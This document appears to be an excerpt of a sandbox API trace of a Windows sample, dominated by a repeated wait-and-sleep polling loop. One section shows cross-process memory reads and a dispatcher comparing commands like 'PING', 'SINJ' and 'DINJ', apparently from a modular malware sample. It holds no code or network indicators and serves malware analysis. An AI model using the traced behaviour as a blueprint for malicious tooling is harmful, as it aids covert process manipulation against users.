	[0243.532] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0243.532] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0243.532] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c0530) returned 1
	[0243.532] Sleep (dwMilliseconds=0xbb8) 
	[0243.548] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0243.548] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0243.548] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0243.548] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0243.548] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0243.548] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0243.548] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c0530) returned 1
	[0243.548] Sleep (dwMilliseconds=0xbb8) 
	[0243.563] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0243.564] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0243.564] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0243.564] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0243.564] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0243.564] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0243.564] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c0530) returned 1
	[0243.564] Sleep (dwMilliseconds=0xbb8) 
	[0243.580] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0243.580] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0243.580] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0243.580] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0243.580] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0243.580] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0243.580] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c0530) returned 1
	[0243.580] Sleep (dwMilliseconds=0xbb8) 
	[0243.595] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0243.595] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0243.595] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0243.595] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0243.595] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0243.595] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0243.595] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c0530) returned 1
	[0243.595] Sleep (dwMilliseconds=0xbb8) 
	[0243.610] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0243.610] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0243.610] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0243.610] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0243.610] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0243.610] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0243.611] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c0530) returned 1
	[0243.611] Sleep (dwMilliseconds=0xbb8) 
	[0243.626] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0243.626] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0243.626] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0243.626] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0243.626] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0243.626] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0243.626] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c0530) returned 1
	[0243.626] Sleep (dwMilliseconds=0xbb8) 
	[0243.642] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0243.642] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0243.642] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0243.642] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0243.642] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0243.642] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0243.642] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c0530) returned 1
	[0243.642] Sleep (dwMilliseconds=0xbb8) 
	[0243.657] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0243.657] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0243.657] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0243.658] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0243.658] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0243.658] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0243.658] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c0530) returned 1
	[0243.658] Sleep (dwMilliseconds=0xbb8) 
	[0243.673] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0243.673] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0243.673] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0243.673] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0243.673] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0243.673] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0243.673] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c0530) returned 1
	[0243.673] Sleep (dwMilliseconds=0xbb8) 
	[0243.689] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0243.690] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0243.690] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0243.690] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0243.690] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0243.690] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0243.690] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c0530) returned 1
	[0243.690] Sleep (dwMilliseconds=0xbb8) 
	[0243.704] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0243.704] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0243.705] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0243.705] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0243.705] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0243.705] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0243.705] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c0530) returned 1
	[0243.705] Sleep (dwMilliseconds=0xbb8) 
	[0243.721] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0243.721] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0243.721] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0243.721] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0243.721] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0243.721] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0243.721] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c0530) returned 1
	[0243.721] Sleep (dwMilliseconds=0xbb8) 
	[0243.773] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0243.773] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0243.773] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0243.773] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0243.773] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0243.773] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0243.773] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c0530) returned 1
	[0243.773] Sleep (dwMilliseconds=0xbb8) 
	[0243.814] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0243.814] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0243.814] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0243.814] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0243.814] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0243.814] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0243.814] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c0530) returned 1
	[0243.814] Sleep (dwMilliseconds=0xbb8) 
	[0243.860] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x102
	[0243.860] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x80) returned 0x2251f8
	[0243.860] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x400) returned 0x26b8780
	[0243.860] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x80) returned 0x226160
	[0243.860] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60034, lpBuffer=0x248fe34, nSize=0x1c, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x248fe34*, lpNumberOfBytesRead=0x248fe0c*=0x1c) returned 1
	[0243.860] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x10064c1c, lpBuffer=0x2251f8, nSize=0x7f, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x2251f8*, lpNumberOfBytesRead=0x248fe0c*=0x7f) returned 1
	[0243.860] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2251f8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 5
	[0243.860] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22fff00
	[0243.860] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2251f8, cbMultiByte=-1, lpWideCharStr=0x22fff00, cchWideChar=5 | out: lpWideCharStr="PING") returned 5
	[0243.860] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xf8fe60, lpBuffer=0x26b8780, nSize=0x3ff, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x26b8780, lpNumberOfBytesRead=0x248fe0c) returned 0
	[0243.860] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xf8fe38, lpBuffer=0x226160, nSize=0x7f, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x226160*, lpNumberOfBytesRead=0x248fe0c*=0x7f) returned 1
	[0243.861] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x226160, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8
	[0243.861] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c0558
	[0243.861] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x226160, cbMultiByte=-1, lpWideCharStr=0x27c0558, cchWideChar=8 | out: lpWideCharStr="browser") returned 8
	[0243.861] SetEvent (hEvent=0x474) returned 1
	[0243.861] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2251f8) returned 1
	[0243.861] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26b8780) returned 1
	[0243.861] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x226160) returned 1
	[0243.861] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c00a8
	[0243.861] lstrcmpiW (lpString1="PING", lpString2="ModuleQuery") returned 1
	[0243.861] lstrcmpiW (lpString1="PING", lpString2="WantRelease") returned -1
	[0243.861] lstrcmpiW (lpString1="PING", lpString2="VERS") returned -1
	[0243.861] lstrcmpiW (lpString1="PING", lpString2="SINJ") returned -1
	[0243.861] lstrcmpiW (lpString1="PING", lpString2="DINJ") returned 1
	[0243.861] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22fff60
	[0243.861] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xd730f0, lpParameter=0x27c0530, dwCreationFlags=0x0, lpThreadId=0x248ff58 | out: lpThreadId=0x248ff58*=0xde8) returned 0x704
	[0243.861] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c00f8
	[0243.861] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0243.861] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0243.862] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0243.862] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0243.862] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0243.862] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c00f8) returned 1
	[0243.862] Sleep (dwMilliseconds=0xbb8) 
	[0243.904] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0243.904] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0243.904] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0243.904] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0243.904] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0243.904] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0243.904] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c00f8) returned 1
	[0243.904] Sleep (dwMilliseconds=0xbb8) 
	[0243.907] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0243.907] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0243.907] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0243.907] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0243.907] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0243.907] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0243.907] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c00f8) returned 1
	[0243.907] Sleep (dwMilliseconds=0xbb8) 
	[0243.922] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0243.922] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0243.922] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0243.922] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0243.922] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0243.922] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0243.923] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c2808) returned 1
	[0243.923] Sleep (dwMilliseconds=0xbb8) 
	[0243.939] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0243.939] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0243.939] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0243.939] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0243.939] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0243.940] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0243.940] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c2808) returned 1
	[0243.940] Sleep (dwMilliseconds=0xbb8) 
	[0243.954] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0243.954] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0243.954] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0243.954] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0243.954] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0243.954] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0243.954] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c2808) returned 1
	[0243.954] Sleep (dwMilliseconds=0xbb8) 
	[0243.970] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0243.970] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0243.970] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0243.970] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0243.970] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0243.970] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0243.970] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c2808) returned 1
	[0243.970] Sleep (dwMilliseconds=0xbb8) 
	[0243.985] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0243.985] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0243.985] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0243.985] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0243.985] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0243.985] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0243.985] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c2808) returned 1
	[0243.985] Sleep (dwMilliseconds=0xbb8) 
	[0244.032] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0244.032] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0244.032] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0244.032] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0244.032] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0244.032] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0244.032] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c2808) returned 1
	[0244.032] Sleep (dwMilliseconds=0xbb8) 
	[0244.047] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0244.047] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0244.047] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0244.047] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0244.047] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0244.048] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0244.048] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c2808) returned 1
	[0244.048] Sleep (dwMilliseconds=0xbb8) 
	[0244.063] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0244.063] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0244.063] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0244.063] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0244.063] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0244.063] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0244.063] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c2808) returned 1
	[0244.063] Sleep (dwMilliseconds=0xbb8) 
	[0244.078] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0244.078] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0244.078] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0244.078] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0244.079] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0244.079] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0244.079] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c2808) returned 1
	[0244.079] Sleep (dwMilliseconds=0xbb8) 
	[0244.094] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0244.094] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0244.094] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0244.094] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0244.094] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0244.094] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0244.094] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c2808) returned 1
	[0244.094] Sleep (dwMilliseconds=0xbb8) 
	[0244.110] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0244.110] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0244.110] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0244.110] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0244.110] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0244.110] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0244.110] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27bfa18) returned 1
	[0244.110] Sleep (dwMilliseconds=0xbb8) 
	[0244.126] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0244.126] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0244.126] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0244.126] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0244.126] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0244.126] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0244.126] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27bfa18) returned 1
	[0244.126] Sleep (dwMilliseconds=0xbb8) 
	[0244.141] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0244.141] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0244.141] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0244.141] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0244.141] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0244.141] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0244.141] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27bfa18) returned 1
	[0244.141] Sleep (dwMilliseconds=0xbb8) 
	[0244.156] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0244.156] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0244.156] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0244.156] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0244.156] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0244.156] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0244.157] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778be0) returned 1
	[0244.157] Sleep (dwMilliseconds=0xbb8) 
	[0244.181] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0244.181] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0244.181] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0244.181] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0244.181] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0244.181] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0244.181] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778be0) returned 1
	[0244.181] Sleep (dwMilliseconds=0xbb8) 
	[0244.188] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0244.188] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0244.188] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0244.188] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0244.188] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0244.188] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0244.188] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778be0) returned 1
	[0244.188] Sleep (dwMilliseconds=0xbb8) 
	[0244.203] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0244.203] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0244.203] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0244.203] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0244.203] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0244.203] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0244.203] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778be0) returned 1
	[0244.203] Sleep (dwMilliseconds=0xbb8) 
	[0244.219] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0244.219] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0244.219] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0244.219] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0244.219] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0244.219] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
